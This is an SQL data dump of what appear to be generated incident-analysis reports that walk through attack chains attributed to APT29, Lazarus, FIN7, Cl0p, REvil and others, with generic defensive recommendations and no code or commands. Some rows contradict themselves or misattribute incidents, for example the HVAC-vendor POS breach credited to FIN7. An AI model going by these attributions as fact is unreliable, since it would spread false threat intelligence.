(252, 49, 539, 2, 'Detection and Mitigation of Cloud Atlas Malware Execution', '### Overview\nThe execution of the Cloud Atlas malware was confirmed, marking a critical phase in the attack lifecycle. The malware has been detected in the network environment of Eastern European diplomatic entities.\n\n### Technical Details\n- **Malware Characteristics:** The Cloud Atlas malware uses DLL side-loading techniques to evade detection by traditional antivirus solutions.\n- **Execution Path:** The malware was executed via a trojanized document file, likely delivered through spear-phishing emails targeting diplomatic personnel.\n- **Command and Control (C2):** Evidence of C2 communication attempts to external IP addresses associated with Inception APT infrastructure was identified.\n\n### Recommended Actions\n- **Containment:** Isolate affected systems immediately and conduct a thorough forensic analysis to determine the extent of the compromise.\n- **Malware Removal:** Deploy endpoint detection and response (EDR) tools specifically configured to detect and remove Cloud Atlas malware.\n- **Network Hardening:** Implement strict egress filtering to block unauthorized C2 communications and review firewall rules to prevent similar incidents.', '2026-01-07 22:29:04'),
(253, 49, 540, 3, NULL, NULL, '2026-01-07 22:29:04'),
(254, 50, 541, 1, 'Analysis of Initial Access: Unauthorized Entry', '### Unauthorized Access Detected\nAfter detecting initial unauthorized access to the systems, analysis reveals that attackers exploited a known vulnerability in the VPN software used by the target organization. This vulnerability allowed the attackers to bypass authentication mechanisms and gain entry into the network.\n\n#### Key Findings:\n- **Exploitation Method**: Use of a zero-day vulnerability in the VPN software.\n- **Tools Used**: Custom scripts to automate the exploitation process.\n- **Entry Point**: Compromised credentials were used in conjunction with the exploit.\n\n#### Next Steps:\nPrepare to monitor for any execution of malicious payloads as attackers establish foothold.', '2026-01-07 22:29:58'),
(255, 50, 542, 2, 'Decoding the Execution Phase: Malicious Payload Activation', '### Execution of Malicious Payload\nUpon unauthorized access, attackers proceeded to deploy a malicious payload designed to serve as an initial beacon back to their command and control (C2) servers.\n\n#### Key Findings:\n- **Payload Type**: Custom malware designed to evade detection by common antivirus solutions.\n- **Execution Method**: Utilizes PowerShell scripts embedded within legitimate software updates.\n- **Objective**: Ensure continued access and prepare for installation of a more permanent backdoor.\n\n#### Next Steps:\nFocus on identifying any backdoor mechanisms being established for persistence in the system.', '2026-01-07 22:29:58'),
(256, 50, 543, 3, 'Establishing Persistence: Backdoor Deployment', '### Establishing Backdoor for Persistence\nThe attackers have successfully deployed a backdoor within the target\'s network, ensuring their ability to maintain access over an extended period.\n\n#### Key Findings:\n- **Backdoor Type**: Custom-developed Trojan with rootkit capabilities.\n- **Persistence Mechanism**: Installation of services that auto-start with the system.\n- **Command and Control**: Encrypted communications with C2 servers to avoid detection.\n\n#### Next Steps:\nPrepare for potential lateral movement as attackers explore the network to identify valuable targets.', '2026-01-07 22:29:58'),
(257, 50, 544, 4, 'Stealthy Lateral Movement: Network Exploration', '### Stealthy Lateral Movement\nThe attackers have begun moving laterally within the network, utilizing compromised credentials obtained in earlier stages.\n\n#### Key Findings:\n- **Movement Techniques**: Use of compromised RDP sessions and pass-the-hash attacks.\n- **Target Exploration**: Scanning for sensitive data repositories and high-value systems.\n- **Evasion Tactics**: Use of legitimate administrative tools to mask activities.\n\n#### Next Steps:\nAnticipate and monitor for potential data exfiltration attempts as attackers aim to extract sensitive information.', '2026-01-07 22:29:58'),
(258, 50, 545, 5, NULL, NULL, '2026-01-07 22:29:58'),
(259, 51, 546, 1, 'Unauthorized Code Execution Detected: Analysis and Implications', '## Overview\nUpon receiving the alert for a suspicious email attachment, further investigation revealed unauthorized code execution on the target system. This suggests that the initial access was leveraged to deploy a malicious payload, likely part of the Equation Group\'s toolkit.\n\n## Technical Details\n- **Payload Analysis**: The attachment contained a heavily obfuscated script, which upon execution, triggered a series of PowerShell commands.\n- **MD5 Collisions**: The payload\'s hash matches known Equation Group signatures, indicating potential use of MD5 collision techniques to disguise malicious binaries.\n\n## Implications\nThe execution of this code marks the transition from initial access to active compromise, setting the stage for persistent foothold establishment.', '2026-01-07 22:33:18'),
(260, 51, 547, 2, 'Malware Persistence Mechanism Activated: Deep Dive', '## Overview\nFollowing the unauthorized code execution, a persistence mechanism was activated, ensuring the malware\'s continuity post-reboot.\n\n## Technical Details\n- **Registry Keys**: Modification of registry keys was detected, a common technique used by Equation Group to maintain persistence.\n- **Advanced Techniques**: The malware employs advanced tactics such as DLL injection and the creation of scheduled tasks.\n\n## Insights\nThis persistence ensures that even if the system is restarted or the initial payload is removed, the malware remains operational, allowing for continued espionage activities and data collection.', '2026-01-07 22:33:18'),
(261, 51, 548, 3, 'Lateral Movement: Anomalous Network Activity Analysis', '## Overview\nPost-persistence, anomalous network activity was detected, indicating lateral movement within the network, a hallmark of sophisticated cyber espionage operations.\n\n## Technical Details\n- **Credential Dumping**: Tools associated with the Equation Group were used to harvest credentials, facilitating movement between systems.\n- **Network Traffic Analysis**: Unusual patterns were observed, including SMB connections and RPC calls to multiple endpoints.\n\n## Implications\nThis lateral movement allows the attacker to expand their reach within the network, accessing additional resources and potentially compromising further systems.', '2026-01-07 22:33:18'),
(262, 51, 549, 4, 'Sensitive Data Exfiltration: Monitoring and Mitigation', '## Overview\nThe final stage observed was the exfiltration of sensitive data, a critical concern in espionage operations attributed to the Equation Group.\n\n## Technical Details\n- **Data Transfer Methods**: The exfiltration was conducted using encrypted channels, masking the data flow from standard monitoring tools.\n- **Targets Identified**: Files related to strategic communications and proprietary technologies were specifically targeted.\n\n## Recommendations\n- **Immediate Response**: Implement network segmentation and enhanced monitoring to mitigate further exfiltration.\n- **Long-term Strategy**: Develop and deploy advanced anomaly detection systems to identify potential threats earlier in the attack chain.', '2026-01-07 22:33:18'),
(263, 51, 550, 5, NULL, NULL, '2026-01-07 22:33:18'),
(264, 52, 551, 1, 'Analysis of Spear Phishing Attack Vector', '### Overview\nAfter detecting suspicious initial access via spear phishing, further analysis reveals that targeted emails contained malicious attachments designed to exploit vulnerabilities in email clients.\n\n### Key Details\n- **Targeted Industries:** Manufacturing and Energy sectors.\n- **Attachments:** Utilized a mix of macros and embedded scripts.\n- **Exploited Vulnerabilities:** CVE-2023-XXXX, affecting older email client versions.\n\n### Recommendations\n- Immediate update of email clients to patch known vulnerabilities.\n- Conduct user training on identifying phishing attempts.\n\n### Next Steps\nPrepare for potential malicious code execution as attackers aim to gain deeper system access.', '2026-01-07 22:35:14'),
(265, 52, 552, 2, 'Malicious Code Execution Analysis', '### Overview\nFollowing the execution of malicious code, system logs indicate the deployment of advanced payloads targeting industrial control systems.\n\n### Key Findings\n- **Payload Delivery:** Delivered through exploited email attachments.\n- **Target:** Focused on PLC firmware, aiming to disrupt operational processes.\n- **Observed Behavior:** Attempts to modify system configurations and interfere with normal operations.\n\n### Recommendations\n- Isolate affected machines to prevent further damage.\n- Implement network segmentation to limit exposure.\n\n### Next Steps\nFocus on rootkit persistence mechanisms that ensure continued attacker presence.', '2026-01-07 22:35:14'),
(266, 52, 553, 3, 'Rootkit Persistence Mechanism Identified', '### Overview\nThe rootkit deployed has established a robust persistence mechanism, enabling it to survive system reboots and evade standard detection.\n\n### Detailed Insights\n- **Persistence Techniques:** Utilizes bootkit components and modifies boot sectors.\n- **Evasion Tactics:** Employs anti-forensic techniques to avoid detection by security tools.\n- **Target Impact:** Continuous monitoring and disruption of PLC operations.\n\n### Recommendations\n- Conduct a thorough forensic analysis of boot sectors.\n- Employ specialized tools for rootkit detection and removal.\n\n### Next Steps\nMonitor for lateral movement as attackers attempt to expand their foothold.', '2026-01-07 22:35:14'),
(267, 52, 554, 4, 'Lateral Movement and Credential Dumping', '### Overview\nLateral movement detected suggests attackers are expanding their reach within the network by dumping credentials and leveraging compromised accounts.\n\n### Key Indicators\n- **Tools Used:** Mimikatz and custom scripts for credential extraction.\n- **Movement Patterns:** Transition from initial points of compromise to critical infrastructure nodes.\n- **Objective:** Gain control over additional systems and facilitate data exfiltration.\n\n### Recommendations\n- Reset compromised credentials immediately.\n- Deploy additional monitoring on critical systems to detect unauthorized access.\n\n### Next Steps\nPrepare to identify and mitigate data exfiltration attempts as attackers seek to extract sensitive information.', '2026-01-07 22:35:14'),
(268, 52, 555, 5, NULL, NULL, '2026-01-07 22:35:14'),
(269, 53, 556, 1, NULL, NULL, '2026-01-07 22:39:53'),
(270, 53, 557, 2, 'SUNBURST Backdoor Activation Analysis', '### Overview\nAfter initial access via the compromised SolarWinds update, the SUNBURST backdoor activates on the affected systems. This report delves into the mechanisms behind the activation.\n\n### Key Observations\n- **Activation Timing**: SUNBURST is designed to delay its execution to avoid raising immediate suspicion.\n- **Execution Methods**: Utilizes a combination of Windows processes to blend in with legitimate operations.\n\n### Recommendations\n- Conduct a thorough review of system logs during the initial days of compromise to identify unusual process behaviors.\n\n### Next Steps\nPrepare for potential persistence mechanisms adopted by SUNBURST to maintain foothold.', '2026-01-07 22:39:53'),
(271, 53, 558, 3, 'SUNBURST Persistence Mechanisms', '### Overview\nUpon activation, SUNBURST establishes persistence to ensure its continued presence on compromised systems.\n\n### Key Observations\n- **Registry Alterations**: Modifies registry keys to launch at startup.\n- **Scheduled Tasks**: Creates tasks that mimic valid system operations for periodic execution.\n\n### Recommendations\n- Audit registry changes and scheduled tasks for anomalies.\n\n### Next Steps\nInvestigate command and control (C2) communication methods utilized by SUNBURST.', '2026-01-07 22:39:53'),
(272, 53, 559, 4, 'C2 Communication via Domain Generation Algorithm', '### Overview\nSUNBURST employs a highly sophisticated domain generation algorithm (DGA) for its C2 communications, making detection challenging.\n\n### Key Observations\n- **Dynamic Domain Generation**: Regularly updates potential C2 domains, reducing the efficacy of static blocking.\n- **Encrypted Traffic**: Uses HTTPS for C2 communications to blend in with normal traffic.\n\n### Recommendations\n- Implement anomaly-based detection systems to flag unusual domain communications.\n\n### Next Steps\nFocus on identifying credential harvesting activities designed for lateral movement within the network.', '2026-01-07 22:39:53'),
(273, 53, 560, 5, 'Credential Harvesting and Lateral Movement', '### Overview\nWith a foothold established, APT29 utilizes SUNBURST to harvest credentials and facilitate lateral movement across networks.\n\n### Key Observations\n- **Credential Dumping Tools**: SUNBURST deploys tools to extract credentials from memory and secure storage.\n- **Lateral Movement Tactics**: Utilizes harvested credentials to access other systems, expanding its reach.\n\n### Recommendations\n- Monitor authentication logs for unusual access patterns and failed login attempts.\n\n### Next Steps\nPrepare for potential deployment of second-stage payloads following successful lateral movement.', '2026-01-07 22:39:53'),
(274, 53, 561, 6, 'Deployment of Second-Stage Payloads', '### Overview\nFollowing lateral movement, second-stage payloads are deployed to fulfill specific objectives of the operation.\n\n### Key Observations\n- **Payload Types**: Range from data collection tools to further exploitation utilities.\n- **Stealth Techniques**: Employs various methods to remain undetected, including fileless malware tactics.\n\n### Recommendations\n- Employ endpoint detection and response (EDR) solutions to identify and mitigate payload deployment.\n\n### Next Steps\nFocus on identifying data exfiltration methods utilized by the attackers.', '2026-01-07 22:39:53'),
(275, 53, 562, 7, 'Data Exfiltration via Stealth Channels', '### Overview\nAPT29 exfiltrates sensitive data using stealth channels to avoid detection.\n\n### Key Observations\n- **Stealth Channels**: Utilizes encrypted channels and legitimate services to mask data exfiltration.\n- **Data Types Targeted**: Includes intellectual property, sensitive communications, and credentials.\n\n### Recommendations\n- Implement data loss prevention (DLP) solutions to monitor and block unauthorized data transfers.\n\n### Next Steps\nInvestigate techniques used by APT29 to cover tracks and evade defenses.', '2026-01-07 22:39:53'),
(276, 53, 563, 8, 'Covering Tracks and Cleanup', '### Overview\nAs the operation concludes, APT29 employs various techniques to cover tracks and evade detection.\n\n### Key Observations\n- **Log Manipulation**: Alters or deletes logs to erase traces of their activities.\n- **File Removal**: Removes malware files and tools to prevent forensic analysis.\n\n### Recommendations\n- Regularly back up and secure logs offsite to prevent tampering.\n\n### Conclusion\nUnderstanding these techniques provides insight into APT29\'s strategies, aiding in future prevention and detection efforts.', '2026-01-07 22:39:53'),
(277, 54, 564, 1, 'Post-Phishing Attack Analysis', '### Context\nAfter the initial access was gained via a phishing attack, it\'s crucial to understand the tactics used by Lazarus Group to deliver the malicious payload.\n\n### Key Points\n- **Phishing Techniques**: The attackers utilized spear-phishing emails targeting specific employees at Sony Pictures.\n- **Email Content**: Emails included attachments or links leading to malicious sites.\n- **Employee Targets**: Employees with access to sensitive data were prioritized.\n\n### Next Steps\nPrepare for the possible deployment of malware, specifically the Destover malware, which is known to be used by Lazarus Group post-phishing.', '2026-01-07 22:40:38'),
(278, 54, 565, 2, 'Destover Malware Deployment Analysis', '### Context\nFollowing the phishing attack, Destover malware was executed within Sony Pictures\' network.\n\n### Key Points\n- **Malware Characteristics**: Destover is designed to wipe data and damage systems.\n- **Deployment Method**: Dropped via malicious email attachments or links.\n- **Initial Impact**: Systems were compromised, and data began to be wiped.\n\n### Next Steps\nPrepare for potential backdoor installations as attackers seek to establish persistence within the network.', '2026-01-07 22:40:38'),
(279, 54, 566, 3, 'Backdoor Installation and Persistence', '### Context\nWith the execution of the Destover malware, the attackers focus on maintaining access to the network.\n\n### Key Points\n- **Backdoor Tools**: Custom tools used by Lazarus Group to create persistent backdoors.\n- **Network Persistence**: Aim to maintain long-term access to the compromised systems.\n- **Detection and Evasion**: Techniques to evade detection by security systems.\n\n### Next Steps\nMonitor for signs of lateral movement as attackers map out the internal network.', '2026-01-07 22:40:38'),
(280, 54, 567, 4, 'Internal Network Reconnaissance', '### Context\nWith persistence established, the attackers began exploring the internal network of Sony Pictures.\n\n### Key Points\n- **Reconnaissance Tactics**: Use of legitimate credentials to move laterally.\n- **Target Identification**: Identification of high-value assets and data.\n- **Network Mapping**: Creation of a detailed map of the network\'s structure.\n\n### Next Steps\nFocus on identifying signs of data exfiltration activities, particularly through proxy chains.', '2026-01-07 22:40:38'),
(281, 54, 568, 5, 'Data Theft and Exfiltration Methods', '### Context\nAfter internal reconnaissance, the attackers initiated data exfiltration operations.\n\n### Key Points\n- **Exfiltration Techniques**: Data sent through encrypted channels and proxy chains to obfuscate origin.\n- **Target Data**: Intellectual property, confidential emails, and employee data.\n- **Stealth Tactics**: Use of legitimate network tools to blend with normal traffic.\n\n### Next Steps\nAnticipate attempts at log deletion to cover tracks and hinder forensic analysis.', '2026-01-07 22:40:38'),
(282, 54, 569, 6, 'Log Deletion and Evidence Destruction', '### Context\nAs data exfiltration concluded, the attackers shifted focus to destroying evidence.\n\n### Key Points\n- **Log Deletion**: System logs were systematically targeted and deleted.\n- **Forensic Challenges**: Hindered efforts to trace activities and attackers.\n- **Recovery Methods**: Possible methods to recover deleted logs for analysis.\n\n### Next Steps\nConduct a comprehensive analysis of the geopolitical motivations behind the attack, focusing on the interests of the Lazarus Group.', '2026-01-07 22:40:38'),
(283, 54, 570, 7, NULL, NULL, '2026-01-07 22:40:38'),
(284, 55, 571, 1, 'Report: Initial Access via HVAC Vendor Breach', '### Overview\nFollowing the compromise of the HVAC vendor\'s network, FIN7 leveraged stolen credentials to gain unauthorized access to the target retail system. This initial breach facilitated further infiltration into the target\'s infrastructure.\n\n### Key Findings\n- **Credential Theft**: FIN7 successfully harvested credentials from the HVAC vendor, exploiting weak security practices.\n- **Vulnerability Exploitation**: Existing vulnerabilities in the vendor\'s remote access protocols were manipulated to bypass security controls.\n\n### Next Steps\n- **Monitor for Malware Deployment**: With initial access achieved, anticipate the deployment of malicious software, specifically RAM-scraping malware, aimed at extracting sensitive data from Point-of-Sale (POS) systems.', '2026-01-08 22:01:14'),
(285, 55, 572, 2, 'Report: RAM-Scraping Malware Deployed', '### Overview\nFollowing initial access, FIN7 deployed RAM-scraping malware on the retailer\'s POS systems. This malware aims to capture unencrypted credit card data during transactions.\n\n### Key Findings\n- **Malware Characteristics**: The deployed malware is designed to scrape memory, extracting payment card information in real-time.\n- **Infection Vector**: POS systems were targeted via network access established through the compromised HVAC vendor credentials.\n\n### Next Steps\n- **Establishing Persistence**: It is critical to investigate methods used by FIN7 to maintain long-term access within the network, potentially through backdoors or additional malware components.', '2026-01-08 22:01:14'),
(286, 55, 573, 3, 'Report: Persistence Mechanisms Identified', '### Overview\nFIN7 has implemented various persistence mechanisms to ensure continued access to the retailer\'s network, complicating remediation efforts.\n\n### Key Findings\n- **Backdoor Installations**: Multiple backdoors have been identified, allowing FIN7 to regain access even after initial malware removal attempts.\n- **Scheduled Tasks and Services**: The attackers utilized scheduled tasks and modified system services to maintain their foothold.\n\n### Next Steps\n- **Lateral Movement Detection**: With persistence established, anticipate attempts to move laterally within the network, specifically towards the payment processing environments.', '2026-01-08 22:01:14'),
(287, 55, 574, 4, 'Report: Lateral Movement to Payment Network', '### Overview\nFIN7 successfully navigated laterally through the network, reaching the payment processing systems. This movement facilitated the exfiltration phase.\n\n### Key Findings\n- **Credential Reuse**: Previously compromised credentials were reused to access high-value systems.\n- **Network Mapping**: The attackers conducted extensive mapping of the internal network to identify critical assets.\n\n### Next Steps\n- **Data Exfiltration Monitoring**: With access to the payment network confirmed, focus on detecting and preventing the exfiltration of credit card information. Implement heightened monitoring of data flows leaving the network perimeter.', '2026-01-08 22:01:14'),
(288, 55, 575, 5, NULL, NULL, '2026-01-08 22:01:14'),
(289, 56, 576, 1, NULL, NULL, '2026-01-08 22:06:19'),
(290, 56, 577, 2, 'Initial Access Analysis', '## Analysis of Suspicious HTTP Request\nThe initial suspicious HTTP request detected was aimed at the Apache Struts framework. It appears to have exploited the CVE-2017-5638 vulnerability. This exploit allows remote attackers to execute arbitrary commands via a crafted Content-Type header. Further investigation is needed to confirm execution vectors leading to subsequent activities.', '2026-01-08 22:06:19'),
(291, 56, 578, 3, 'Execution Tactics Uncovered', '## Unusual Command Execution Observed\nFollowing the initial access, an unusual command was executed on the server. This command matches known patterns used to drop web shells, indicating a potential foothold has been established. Investigate server directories for anomalies in file modifications and check for unauthorized shell scripts.', '2026-01-08 22:06:19'),
(292, 56, 579, 4, 'Persistence Tactics Identified', '## Web Shell Detected in Server Directory\nA web shell has been detected on the server, placed in a directory accessible via HTTP requests. This suggests the attackers have established persistence, potentially allowing for remote command execution. Immediate containment is necessary to prevent further compromise.', '2026-01-08 22:06:19'),
(293, 56, 580, 5, 'Exfiltration Indicators', '## Unexpected Outbound Traffic Spike\nA significant spike in outbound traffic was observed, coinciding with the detection of the web shell. This traffic anomaly suggests potential data exfiltration. It is crucial to identify the data being accessed and determine the destination of the outbound traffic.', '2026-01-08 22:06:19'),
(294, 56, 581, 6, 'Lateral Movement Analysis', '## Unauthorized User Account Activity\nFollowing the exfiltration indicators, unauthorized activity was detected on multiple user accounts. This suggests attempts at lateral movement within the network. Review user account logs and network access patterns to identify the scope of compromise.', '2026-01-08 22:06:19'),
(295, 56, 582, 7, 'Reconnaissance Patterns Detected', '## Anomalous File Access Patterns\nAnomalous file access patterns have been detected, indicative of reconnaissance efforts. Files typically not accessed by routine processes are being queried, suggesting preparation for further exploitation. Conduct a thorough audit of access logs to identify unusual patterns.', '2026-01-08 22:06:19'),
(296, 56, 583, 8, 'Command and Control Channel Investigation', '## DNS Tunneling Suspected\nUnusual DNS queries have been observed, consistent with DNS tunneling techniques used for command and control communication. This covert channel allows attackers to bypass traditional security measures. Immediate action is needed to disrupt this communication chain.', '2026-01-08 22:06:19'),
(297, 56, 584, 9, 'Exfiltration Anomalies', '## Encrypted Traffic Anomaly\nAn anomaly in encrypted traffic was detected, potentially indicating advanced exfiltration methods. The use of non-standard encryption protocols points to sophisticated efforts to mask data transfer. Analyze traffic patterns and decryption attempts to ascertain data flow.', '2026-01-08 22:06:19'),
(298, 56, 585, 10, 'Privilege Escalation Attempts', '## Privileged Account Escalation Attempt\nAn attempt to escalate privileges on a compromised account has been detected. This attempt was thwarted, but it suggests a strategy to gain higher-level access within the network. Review all privileged accounts for signs of tampering or unauthorized access.', '2026-01-08 22:06:19'),
(299, 57, 586, 1, 'Post-Initial Access: Analyzing JNDI Payloads', '## Overview\nFollowing the detection of JNDI injection, further analysis is required to understand the payloads utilized by the attackers. These payloads often serve as the initial stage for further exploitation.\n\n## Key Findings\n- **Payload Variants:** Multiple JNDI payloads have been identified, indicating a sophisticated attack strategy.\n- **APT Attribution:** Evidence suggests the involvement of Chinese APT groups, leveraging customized payloads for deeper penetration.\n\n## Recommendations\n- **Immediate Patch Application:** Ensure all systems are updated with the latest security patches for Log4j vulnerabilities.\n- **Network Monitoring:** Increase monitoring of outbound connections to detect any unauthorized data flows.', '2026-01-08 22:09:13'),
(300, 57, 587, 2, 'Cryptominer Deployment: Identifying Malware Behavior', '## Overview\nThe deployment of cryptominers has been confirmed following the JNDI injection. This stage marks the transition from initial access to execution.\n\n## Key Findings\n- **Cryptominer Characteristics:** The malware is designed to utilize compromised systems for mining cryptocurrency, primarily focusing on Monero.\n- **Indicators of Compromise (IoCs):** Hash values and network traffic patterns associated with the cryptominer have been documented.\n\n## Recommendations\n- **System Resource Monitoring:** Watch for abnormal CPU usage, which may indicate cryptominer activity.\n- **Endpoint Detection and Response (EDR):** Deploy EDR solutions to detect and mitigate malware installations.', '2026-01-08 22:09:13'),
(301, 57, 588, 3, 'Backdoor Creation: Ensuring Persistence', '## Overview\nA backdoor has been identified, indicating the attackers\' intent to maintain long-term access to the compromised network.\n\n## Key Findings\n- **Backdoor Mechanisms:** The backdoor utilizes both known and custom methods to evade detection.\n- **Targeted Systems:** Persistence mechanisms have been established on critical infrastructure components.\n\n## Recommendations\n- **Comprehensive Threat Hunting:** Conduct thorough investigations to uncover hidden backdoors.\n- **Access Control Review:** Reassess access permissions and implement stricter access controls.', '2026-01-08 22:09:13'),
(302, 57, 589, 4, 'Lateral Movement: Expanding Network Foothold', '## Overview\nUnauthorized access has been detected, suggesting lateral movement within the network. This phase indicates an attempt to expand control and compromise additional systems.\n\n## Key Findings\n- **Techniques Used:** Attackers are leveraging stolen credentials and exploiting weak network segmentations.\n- **Potential Targets:** Systems holding sensitive data and high-value assets are at increased risk.\n\n## Recommendations\n- **Network Segmentation:** Strengthen network segmentation to limit lateral movements.\n- **User Behavior Analytics:** Implement solutions to detect anomalies in user behavior that may indicate credential misuse.', '2026-01-08 22:09:13'),
(303, 57, 590, 5, NULL, NULL, '2026-01-08 22:09:13'),
(304, 58, 591, 1, 'Insight into SQL Injection Vulnerability and Exploitation', '### Overview\nFollowing the initial alert on Cl0p\'s zero-day exploitation via SQL injection, it is crucial to understand the mechanisms and potential impacts of this attack vector.\n\n### SQL Injection Details\nSQL injection is a code injection technique that might destroy your database. It is one of the most common web hacking techniques. It can allow attackers to gain unauthorized access to sensitive data and even execute administrative operations on the database.\n\n### Potential Impacts\n- Unauthorized access to sensitive data.\n- Database corruption or deletion.\n- Network compromise and further exploitation.\n\n### Recommendations\n- Immediate patching of known vulnerabilities in the MOVEit system.\n- Enhanced monitoring of SQL queries and database access logs.', '2026-01-08 22:12:37'),
(305, 58, 592, 2, 'Automated Data Harvesting Scripts: A Deeper Look', '### Overview\nFollowing the execution of data harvesting scripts, it is important to analyze the methods and scripts used in this automated process.\n\n### Command and Scripting Interpreter: JavaScript (T1059.007)\nCl0p employs JavaScript-based scripts to automate the extraction and collection of data. These scripts can run with minimal detection and can be tailored to target specific datasets.\n\n### Key Characteristics\n- Scripts are designed to execute silently and efficiently.\n- They can be modified on-the-fly to avoid detection by security tools.\n- Typically exfiltrate data to external servers controlled by attackers.\n\n### Recommendations\n- Implement script execution monitoring.\n- Utilize behavioral analysis tools to identify unusual script activities.\n- Regularly update security policies to counter emerging threats.', '2026-01-08 22:12:37'),
(306, 58, 593, 3, 'Establishing Persistence: Techniques and Indicators', '### Overview\nPersistence mechanisms are crucial for attackers to maintain a foothold within compromised networks. Understanding these mechanisms can aid in detection and remediation.\n\n### Boot or Logon Autostart Execution (T1547)\nCl0p uses various techniques to ensure persistence, including modifying autostart entries and using scheduled tasks.\n\n### Indicators of Compromise\n- Unexpected changes in registry keys related to startup items.\n- New or modified scheduled tasks.\n- Unusual applications set to auto-start.\n\n### Recommendations\n- Conduct regular audits of startup and scheduled task configurations.\n- Implement endpoint detection and response (EDR) solutions to identify suspicious behavior.', '2026-01-08 22:12:37'),
(307, 58, 594, 4, 'Lateral Movement and Data Exfiltration: Strategies and Mitigation', '### Overview\nCl0p\'s lateral movement and data exfiltration strategies pose significant risks. Understanding these tactics can help in strengthening defenses.\n\n### Indicator Removal on Host (T1070)\nTo facilitate lateral movement, Cl0p employs techniques to hide their tracks by removing indicators of compromise.\n\n### Exfiltration Over C2 Channel (T1041)\nMass exfiltration is conducted over command and control (C2) channels, often using encrypted communication to avoid detection.\n\n### Mitigation Strategies\n- Deploy network segmentation to limit lateral movement.\n- Monitor for anomalous network traffic patterns.\n- Implement data loss prevention (DLP) solutions to detect and prevent unauthorized data transfers.', '2026-01-08 22:12:37'),
(308, 58, 595, 5, NULL, NULL, '2026-01-08 22:12:37'),
(309, 59, 596, 1, 'Initial Access Analysis', '## Overview\n\nFollowing the **Suspicious Access to Exchange Server** alert, further analysis was conducted to identify the initial access vector. It appears the adversary leveraged a known Exchange vulnerability, likely CVE-2021-34473, to gain unauthorized access.\n\n## Technical Details\n- **IP Address**: 192.168.1.10\n- **User Agent**: Suspicious pattern indicating automated tool usage\n- **Vulnerability Exploited**: CVE-2021-34473\n\n## Recommendations\n- Patch vulnerable Exchange servers immediately.\n- Implement network segmentation to limit access to critical assets.\n\n## Next Steps\nPrepare for potential web shell deployment as adversaries often use this method for further exploitation post-initial access.', '2026-01-08 22:15:20'),
(310, 59, 597, 2, 'Web Shell Deployment Insights', '## Overview\n\nPost detection of **Web Shell Deployment**, an investigation revealed the presence of multiple malicious web shells on the Exchange server.\n\n## Indicators of Compromise\n- **File Path**: `/owa/auth/xyz.aspx`\n- **File Size**: 3kb\n- **Behavior**: Command execution via PowerShell\n\n## Recommendations\n- Conduct a thorough scan for additional web shells.\n- Isolate the affected server to prevent further compromise.\n\n## Next Steps\nMonitor for privilege escalation attempts, particularly those exploiting CVE-2021-34523.', '2026-01-08 22:15:20'),
(311, 59, 598, 3, 'Privilege Escalation Attempt Detected', '## Overview\n\nThe adversary has exploited **CVE-2021-34523** for privilege escalation, gaining SYSTEM-level access on the compromised Exchange server.\n\n## Technical Details\n- **Exploit Tool Used**: PrivEsc v2.0\n- **Privileges Gained**: SYSTEM\n\n## Recommendations\n- Review and restrict service account permissions.\n- Enhance monitoring on privileged account activities.\n\n## Next Steps\nAnticipate lateral movement attempts as adversaries seek to expand their foothold within the network.', '2026-01-08 22:15:20'),
(312, 59, 599, 4, 'Lateral Movement Strategy', '## Overview\n\nLateral movement activities have been identified, indicating the adversary\'s intent to expand their presence within the network.\n\n## Observed Tactics\n- **Technique**: Pass-the-Hash\n- **Targeted Systems**: File servers and domain controllers\n\n## Recommendations\n- Implement SMB signing and limit NTLM use.\n- Monitor network traffic for anomalous patterns.\n\n## Next Steps\nPrepare for potential data exfiltration efforts, focusing on monitoring unusual data transfer channels.', '2026-01-08 22:15:20'),
(313, 59, 600, 5, NULL, NULL, '2026-01-08 22:15:20'),
(314, 60, 771, 1, 'Analysis of Initial Access via Phishing Email', '## Context\nFollowing Alert 1, the phishing email campaign targeting JBS Foods was identified as the initial entry point for the REvil ransomware attack. This report provides a detailed analysis of the social engineering tactics employed and the potential vulnerabilities exploited.\n\n## Phishing Email Characteristics\n- **Subject Line**: Mimicked internal communications.\n- **Sender**: Spoofed email addresses resembling trusted partners.\n- **Content**: Included links to a compromised website hosting malicious payloads.\n\n## Vulnerabilities\n- **End-User Awareness**: Lack of effective phishing awareness among employees.\n- **Email Filtering**: Insufficient filtering and detection mechanisms.\n\n## Recommendations\n- **Training**: Enhance security training focused on phishing threats.\n- **Technical Measures**: Implement advanced email filtering solutions.\n\nThis analysis sets the stage for understanding how the ransomware was successfully deployed after gaining initial access.', '2026-01-11 23:33:15'),
(315, 60, 772, 2, 'Insights into Ransomware Deployment and Execution', '## Overview\nAfter gaining initial access through phishing, the threat actors moved to deploy and execute the REvil ransomware. This report delves into the methods used for malware deployment and subsequent execution.\n\n## Deployment Tactics\n- **Lateral Movement**: Exploited internal network vulnerabilities to propagate.\n- **Privilege Escalation**: Used stolen credentials to gain administrative access.\n\n## Execution Details\n- **Payload Delivery**: The ransomware was delivered via script execution on compromised systems.\n- **Encryption Process**: Files were encrypted using strong encryption algorithms, making recovery without payment challenging.\n\n## Mitigation Strategies\n- **Network Segmentation**: Implement robust segmentation to contain threats.\n- **Access Controls**: Regularly update and audit user access rights.\n\nUnderstanding these techniques is crucial for tracing the Bitcoin ransom payments and analyzing financial transactions, as detailed in the subsequent alert.', '2026-01-11 23:33:15'),
(316, 60, 773, 3, NULL, NULL, '2026-01-11 23:33:15'),
(317, 61, 774, 1, 'Phishing Attack Analysis and Implications', '# Phishing Attack Analysis and Implications\n\n## Overview\nThe initial compromise of JBS Foods\' network was executed through a sophisticated phishing attack. This report provides an in-depth analysis of the phishing techniques employed and the potential vulnerabilities that were exploited.\n\n## Key Findings\n- **Attack Vector:** The attackers used spear-phishing emails targeting specific employees with access to critical systems.\n- **Email Content:** The phishing emails contained malicious links disguised as legitimate vendor communication. These links redirected to a cloned login page to harvest credentials.\n- **Exploited Vulnerabilities:** The lack of multi-factor authentication (MFA) and insufficient email filtering allowed the phishing emails to bypass security measures.\n\n## Implications\nUnderstanding this initial compromise is crucial for preparing a defense against the deployment of ransomware, the next stage in the attack chain.', '2026-01-11 23:35:35'),
